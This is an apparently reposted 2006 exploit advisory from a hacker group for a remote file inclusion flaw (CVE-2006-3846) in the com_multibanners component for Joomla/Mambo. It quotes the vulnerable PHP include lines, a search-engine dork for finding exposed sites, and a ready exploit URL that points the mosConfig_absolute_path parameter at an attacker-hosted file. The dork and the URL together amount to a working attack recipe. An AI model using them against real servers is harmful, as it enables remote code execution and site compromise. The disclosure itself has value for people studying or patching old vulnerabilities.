Topic:	Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
Credit:	Blue|Spy
Date:	2006.07.26
CWE:	CWE-94 (Show similar)
CVE:	CVE-2006-3846 (Show details) Use CVE to see details like: - CVSS2, - Affected Software, - References

#############################SolpotCrew Community################################

#

# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

#

# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt

#

########################################################################
#########

#

#

# Bug Found By :Blue|Spy

#

# contact: mail (at) blue-spy (dot) net [email concealed]

#

# Website : http://kunamgede.biz, http://blue-spy.net

#

########################################################################
########

#

#

# Greetz: h4ntu , Fungky, Solpot, Matdhule

# and all crew #mardongan @ irc.dal.net

#

#

########################################################################
#######

code from extadminmenus.class.php

if (phpversion() < '4.2.0') {

require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );

}

if (phpversion() < '4.3.0') {

require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );

}

Dork:

inurl:com_multibanners

exploit:

http://site.com/[path]//administrator/components/com_multibanners/extadm
inmenus.class.php?mosConfig_absolute_path=[attacker]

##############################MY LOVE JUST FOR U LIENA#########################

########################################################################